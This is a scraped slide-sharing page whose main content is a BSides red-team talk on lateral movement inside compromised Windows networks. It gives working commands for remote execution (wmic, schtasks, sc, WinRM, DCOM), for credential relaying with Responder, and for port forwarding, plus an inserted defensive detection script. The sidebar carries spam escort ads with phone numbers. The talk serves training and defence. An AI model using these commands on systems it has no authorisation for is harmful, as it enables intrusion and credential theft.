Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
What's New and Newer in Apache httpd-24
What's New and Newer in Apache httpd-24What's New and Newer in Apache httpd-24
What's New and Newer in Apache httpd-24
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?
 
Bridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial TradecraftBridging the Gap: Lessons in Adversarial Tradecraft
Bridging the Gap: Lessons in Adversarial Tradecraft
 

Recently uploaded

Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetEnjoy Anytime
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 

Recently uploaded (20)

Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 

Bsides final

1. BSIDES FIRST TIME PRESENTERS
Movement After Initial Compromise
MATT BATTEN (@SleepZ3R0)
COLLYN HARTLEY (@HA12TL3Y)

2. Matt Batten (SleepZ3R0)
▶ Twitter: @SleepZ3R0
▶ https://github.com/SleepZ3R0
▶ Where I work:
▶ Husband / Red Teamer / Penetration Tester / Developer / Marine Corps Veteran / Cat Dad

3. Collyn Hartley (HA12TL3Y)
▶ Twitter: @HA12TL3Y
▶ Military Red Teamer
▶ Brother / Red Teamer / Penetration Tester / Active Duty Military / Dog Dad

4. What will be covered
▶ Initial recon once on a compromised system
▶ Lateral movement
▶ How to do port forwarding in more than one way, with real examples
▶ How to utilize tradecraft to not get caught while moving
▶ What tools are being used today

5. Setting the Stage
▶ You have already compromised a system utilizing your preferred method

6. First things first…
Once on a compromised system, here are some questions to ask yourself.
▶ Who am I on this network?
▶ Where am I in this network?
▶ Can I move to another system with my current permissions?
▶ Can I get SYSTEM on my current compromised system?

7. Understand your surroundings, Part 1
▶ net user
▶ net user /domain
▶ net group "Domain Admins" /domain
▶ net group /domain
▶ net use
▶ net start
▶ net localgroup /domain
▶ netstat -ano
▶ netsh firewall show state
▶ netsh firewall show config

8. Understand your surroundings, Part 2
▶ ipconfig /all
▶ route print
▶ tasklist /SVC
▶ arp -a
▶ driverquery
▶ hostname
▶ wmic qfe
▶ set
▶ systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
▶ schtasks /query /fo LIST /v
▶ whoami
▶ whoami /all
▶ echo %logonserver%
▶ echo %username%
9. (screenshots) net user, net user /domain, net group "domain admins" /domain, net group /domain

10. (screenshots) net start, net localgroup /domain

12. (screenshots) netsh firewall show config, route print

14. (screenshots) arp -a, set, schtasks /query /fo list /v
17. DLL Hijacking
▶ PowerUp has a built-in module for DLL hijacking that can be used to accomplish privilege escalation on the target.
18. Remote Code Execution #1
▶ WMIC
Shell: wmic /node:<target> process call create "C:\windows\temp\matt.exe"

21. Remote Code Execution #2
▶ SCHTASKS
Shell: schtasks /create /tn <matt> /tr c:\windows\temp\matt.exe /sc once /st 00:00 /s <target> /RU system
Shell: schtasks /run /tn <matt> /s <target>
Then delete the task after it executes:
Shell: schtasks /delete /tn <matt> /s <target> /F

23. Remote Code Execution #3
▶ SERVICE (SC)
Shell: sc \\<target> create <matt> binpath= "c:\windows\temp\<matt.exe>"
Shell: sc \\<target> start <matt>
Make sure to delete the service after it runs:
Shell: sc \\<target> delete <matt>
26. WinRM
▶ Listens on ports 5985 and 5986 (5986 is the encrypted listener)
▶ If 5985 is open then you can enumerate using WinRM
▶ You have to have local admin permissions to run:
Invoke-Command -ComputerName TARGET -ScriptBlock {commands}
▶ On Windows Server 2008 and newer there is also Windows Remote Shell (WRS):
winrs -r:http://WIN-2NE38K15TGH/wsman "cmd"

29. DCOM
▶ Matt Nelson documented this method of using DCOM over RPC to instantiate an "MMC20.Application" COM object and then calling its ExecuteShellCommand method.
▶ Result: immediate command execution under the administrative account used.
▶ Implementation details: connect to the remote procedure call portmapper interface (the RpcSs service in svchost.exe, listening directly on TCP port 135), then to an RPC server on an ephemeral port (such as 49154 or 49159).
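Every method on slides 18 through 29 leaves a trace on the target host (a child of WmiPrvSE.exe or wsmprovhost.exe, a 4698 task-created event, a 7045 service-installed event, or a shell spawned by mmc.exe). The following detection sketch is an added example, not part of the talk; it uses invented key=value records and field names, and assumes process-creation auditing (event 4688 with parent process) is enabled.

```python
"""Added detection example: flag on-target traces of the remote execution methods above
in constructed Windows event records (invented field names; assumes 4688 auditing is on)."""
import re
REMOTE_PARENTS = {  # a child of one of these hosts was started through a remote session
    "wmiprvse.exe": "WMI process call create (slide 18)",
    "wsmprovhost.exe": "WinRM Invoke-Command (slide 26)",
}

def parse_event(line: str) -> dict:
    """Parse Key=value and Key="quoted value" pairs into a dict (keys lower-cased)."""
    return {k.lower(): q or b for k, q, b in re.findall(r'(\w+)=(?:"([^"]*)"|(\S+))', line)}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()  # last component of a Windows path

def classify(ev: dict):
    """Return a technique label for one event, or None if nothing matches."""
    eid = ev.get("eventid")
    if eid == "7045":   # System log: new service installed (sc create)
        return "remote service via sc (slide 23)"
    if eid == "4698":   # Security log: scheduled task created (schtasks /create)
        return "remote scheduled task via schtasks (slide 21)"
    if eid == "4688":   # Security log: process creation with parent process
        parent = basename(ev.get("parentprocess", ""))
        child = basename(ev.get("newprocess", ""))
        if parent in REMOTE_PARENTS:
            return REMOTE_PARENTS[parent]
        if parent == "mmc.exe" and child in ("cmd.exe", "powershell.exe"):  # ExecuteShellCommand
            return "DCOM MMC20.Application (slide 29)"
    return None

def scan(lines) -> list:
    """Return (host, label) for every record that matches a technique."""
    hits = []
    for ev in map(parse_event, lines):
        label = classify(ev)
        if label:
            hits.append((ev.get("host", "?"), label))
    return hits

SAMPLE_EVENTS = [  # constructed records; hosts and paths are invented
    r'EventID=4688 Host=WS01 NewProcess="C:\windows\temp\matt.exe" ParentProcess="C:\Windows\System32\wbem\WmiPrvSE.exe"',
    r'EventID=4698 Host=WS02 TaskName="\matt" Command="c:\windows\temp\matt.exe"',
    r'EventID=7045 Host=WS03 ServiceName=matt ImagePath="c:\windows\temp\matt.exe"',
    r'EventID=4688 Host=WS04 NewProcess="C:\Windows\System32\cmd.exe" ParentProcess="C:\Windows\System32\mmc.exe"',
    r'EventID=4688 Host=WS05 NewProcess="C:\Windows\System32\notepad.exe" ParentProcess="C:\Windows\explorer.exe"',
]
if __name__ == "__main__":
    for host, label in scan(SAMPLE_EVENTS):
        print(f"{host}: {label}")
```

The WS05 record is a benign control and produces no hit; 7045 and 4698 will also fire on legitimate administration, so in practice the image path and task command should be compared against what is expected on that host.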
31. Responder
LLMNR and NBT-NS spoofing is an easy way, even today, to harvest credentials and move laterally based off of normal network traffic.

34. Multi-Relay
▶ A powerful pentest utility included in Responder's tools folder that gives you the ability to perform targeted NTLMv1 and NTLMv2 relay against a selected target.
▶ Currently MultiRelay relays HTTP, WebDAV, Proxy, and SMB authentications to an SMB server.
▶ This tool can be customized to accept a range of users to relay to a target. The concept behind this is to only target domain Administrators, local Administrators, or privileged accounts.
36. PORT FORWARDING
▶ SSH port forwarding
ssh -L 8080:internalTarget:80 user@compromisedMachine
▶ Metasploit port forwarding
portfwd add -l 3389 -p 3389 -r 172.16.194.191
▶ Plink port forwarding
plink.exe {host-B} -P 22 -C -L 127.0.0.1:444:{host-C}:3389 -l username -pw password
▶ Proxychains port forwarding: SOCKS with Cobalt Strike

40. Port Forwarding through Meterpreter (screenshots)
44. References
▶ http://www.itprotoday.com/management-mobility/psexec
▶ http://g-laurent.blogspot.com/2016/10/introducing-responder-multirelay-10.html
▶ https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning
▶ https://pen-testing.sans.org/blog/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python
▶ https://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
▶ https://github.com/gentilkiwi/mimikatz
▶ https://specterops.io/
▶ https://github.com/rsmudge
▶ https://www.reddit.com/r/AskNetsec/comments/87cfh0/responderpy_mitigation/ (n00py)
▶ https://github.com/BloodHoundAD/BloodHound/
▶ https://blog.rapid7.com/2012/11/08/abusing-windows-remote-management-winrm-with-metasploit/
▶ https://www.cybereason.com/blog/dcom-lateral-movement-techniques
▶ https://blog.varonis.com/dcom-distributed-component-object-model
45. People who have influenced us and this talk (even if they don't know it!)
@harmj0y @malwareunicorn @_wald0 @ReL1K @CptJesus @mstair @MadHatt3r @MalwareJake @shortxstack @enigma0x3 @r3dQu1nn @danielhbohannon @merrillmatt011 @georgiaweidman @PyroTek3 @mubix @byt3bl33d3r @H011YxW00D @armitagehacker @Lee_Holmes @gentilkiwi @SpectorOps
46. If you enjoyed this talk and would like to know more
▶ Check out the references on the earlier slide.
▶ Slides will be published publicly.
▶ Because we do not know where we are posting the slides yet, follow us on Twitter and we will let you know shortly.
▶ If you have any questions or are just interested in talking, feel free to message either of us on Twitter, and we will respond in a timely manner.
▶ @SleepZ3R0
▶ https://github.com/SleepZ3R0
▶ @HA12TL3Y
Questions?